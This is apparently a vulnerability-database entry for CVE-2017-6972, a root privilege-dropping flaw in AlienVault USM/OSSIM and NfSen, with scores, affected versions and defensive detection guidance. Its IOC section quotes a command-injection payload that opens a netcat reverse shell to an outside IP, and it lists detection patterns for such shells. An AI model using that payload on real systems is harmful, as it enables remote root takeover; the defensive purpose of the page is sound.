cbcvebase.
CVE-2017-6972
published 2017-03-22

CVE-2017-6972: AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka…

PriorityP266critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
14.60%
96.2th percentile
AlienVault USM and OSSIM before 5.3.7 and NfSen before 1.3.8 have an error in privilege dropping and unnecessarily execute the NfSen Perl code as root, aka AlienVault ID ENG-104945, a different vulnerability than CVE-2017-6970 and CVE-2017-6971.

Affected

3 ranges
VendorProductVersion rangeFixed in
alienvaultossim<= 5.3.6
alienvaultunified_security_management<= 5.3.6
nfsennfsen<= 1.3.7

Detection & IOCsextracted from sources · hover to see the quote

command'; nc -ne /bin/bash 10.100.1.2 443 #
  • Monitor HTTP requests to the NfSen/AlienVault netflow processing web page for the 'customfmt' parameter containing shell metacharacters (e.g., single quotes, semicolons, pipe characters) indicative of command injection attempts.
  • Detect injection payloads in the 'Custom output format' input field containing shell command sequences such as `'; <command> #` patterns.
  • Alert on outbound netcat (nc) connections spawned by the NfSen Perl process or web server process, especially reverse shell patterns (nc -ne /bin/bash).
  • Detect NfSen Perl processes running as root, as the vulnerability involves unnecessary privilege retention (failure to drop root) during NfSen Perl code execution.
  • Correlate use of a stolen PHP Session ID with subsequent crafted requests to the netflow processing endpoint as a potential indicator of pre-authentication exploitation.
  • ·The exploit affects NfSen versions 1.3.6p1, 1.3.7, and 1.3.7-1~bpo80+1_all; previous versions are also likely vulnerable. CVE-2017-6972 is distinct from CVE-2017-6970 and CVE-2017-6971 but is chained with CVE-2017-7175 (the injection vector) to achieve remote root code execution.
  • ·The reverse shell PoC uses nc; if nc is not present on the target, alternative payloads may still exploit the same injection point, so detection should not rely solely on nc-based signatures.
  • ·AlienVault USM/OSSIM versions affected are below 4.3.1 per the exploit, but the NVD advisory states the fix is in version 5.3.7; defenders should verify the exact version boundary for their deployment.

CVSS provenance

nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.